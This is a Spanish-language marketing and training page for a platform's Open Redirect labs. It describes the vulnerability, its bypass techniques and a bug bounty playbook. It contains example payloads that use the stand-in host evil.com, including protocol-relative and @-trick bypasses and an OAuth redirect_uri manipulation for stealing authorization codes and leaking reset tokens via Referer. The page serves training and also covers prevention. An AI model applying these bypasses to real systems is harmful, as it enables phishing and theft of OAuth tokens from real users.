Nuevos labs cada semana — Accede a todos desde 7,99€/mes

>Inicio>Labs>New labs>Creators>Ranking>Aprender>Empresa>Precios
Iniciar SesiónCrear Cuenta

Labs de Open Redirect

Open Redirect

¿Qué es Open Redirect?

Un Open Redirect ocurre cuando una aplicación redirige a los usuarios a URLs controladas por el atacante sin validación. Puede usarse para phishing, robo de tokens OAuth y como componente en cadenas de ataque más complejas.

¿Por qué practicar Open Redirect?

Aunque muchos programas lo consideran bajo impacto por sí solo, el Open Redirect es un componente clave en cadenas de ataque: SSRF, OAuth token theft y phishing dirigido. Aprender a encadenarlo con otras vulns multiplica tu impacto y abre triage que de otra forma sería marcado como informational.

¿Qué aprenderás con los labs de Open Redirect?

Aprenderás patterns de redirect comunes (?next=, ?return=, ?callback=), técnicas de bypass de validación (//evil.com, ///, @, IDN homograph), abusar de redirect_uri en OAuth para robar codes/tokens, y construir reports que demuestren impacto real (no solo "redirige a Google").

Tipos de Open Redirect que cubrimos

  • Protocol-relative

    //evil.com — el browser interpreta como hostname. Pasa allowlists que solo chequean prefijo http/https.

  • Backslash bypass

    https://app.com\@evil.com — algunos parsers tratan \ como /, otros como literal. Discrepancia = bypass.

  • OAuth redirect_uri

    Si la app permite wildcards en redirect_uri o no valida path, se roba el authorization code.

  • @ trick

    https://app.com@evil.com — la parte antes de @ es userinfo. Bypassa validators que solo splittan por slash.

¿Cómo encontrar y explotar Open Redirect?

Playbook práctico — del recon a la prueba de concepto.

  1. 1

    Cazar el parámetro de redirect

    Busca parámetros típicos que controlan a dónde te lleva la app tras una acción (login, logout, continuar).

    ?next=  ?return=  ?returnUrl=  ?redirect=  ?url=  ?callback=  ?dest=
  2. 2

    Probar un destino externo directo

    Mete tu dominio y observa si la app te redirige fuera sin validar. Si va directo, ya tienes el Open Redirect.

    https://target/login?next=https://evil.com
  3. 3

    Bypassear la validación

    Si filtran dominios externos, prueba URLs protocol-relative, el truco de @ (userinfo), backslashes y dobles slashes.

    //evil.com   ·   https://target.com@evil.com   ·   https://target.com\@evil.com   ·   /\evil.com
  4. 4

    Atacar redirect_uri de OAuth

    En flujos OAuth, manipula redirect_uri a un dominio/path tuyo. Si valida laxo, el authorization code llega a tu servidor.

    /oauth/authorize?...&redirect_uri=https://evil.com/cb&response_type=code
  5. 5

    Subir el impacto encadenando

    Solo no vale mucho. Úsalo para robar tokens OAuth, fugar el header Referer con secretos, o saltarte la allowlist de un SSRF.

    evil.com recibe en logs: Referer: https://target/reset?token=ABC123

Aprende la teoría

Academy: OAuth & SSO

Cargando labs...

Ver en catálogo completo →

Preguntas frecuentes

¿Qué es un Open Redirect?

Es una vulnerabilidad en la que la app redirige al usuario a una URL controlada por el atacante porque no valida el destino. Se usa para phishing convincente, robo de tokens OAuth y como pieza en cadenas con SSRF.

¿Cómo se explota un Open Redirect?

Se manipula un parámetro de redirección (next, return, url) para apuntar a un dominio externo. Si hay validación, se bypassea con tricks como //evil.com, target.com@evil.com o backslashes, y se eleva el impacto robando códigos OAuth o el header Referer.

¿Cómo encontrar Open Redirect en bug bounty?

Identifica todos los parámetros que controlan navegación tras login, logout u OAuth, y prueba destinos externos y sus bypasses. El callback de OAuth (redirect_uri) es el punto más rentable porque permite robar el authorization code.

¿Cómo prevenir el Open Redirect?

Usa una allowlist de destinos permitidos, redirige solo a rutas relativas internas, valida que el host coincide exactamente con el tuyo y, en OAuth, exige coincidencia exacta de redirect_uri registrada.

¿Por qué un Open Redirect suele pagar poco solo?

Porque por sí mismo el impacto es phishing, que muchos programas marcan como informational. El valor está en encadenarlo: robo de tokens OAuth, bypass de allowlist de SSRF o fuga de secretos vía Referer convierten un P5 en un P2/P1.

Otras categorías relacionadas

SSRF

Server-Side Request Forgery (SSRF)

CSRF

Cross-Site Request Forgery (CSRF)

Auth Bypass

Authentication Bypass

→ Ver todas las vulnerabilidades→ Academy gratuita→ Precios desde 7,99€/mes

Empieza con labs de Open Redirect

Practica Open Redirect con labs basados en reportes reales. En español. Desde 7,99€/mes.

Empieza con el primer lab de Open Redirect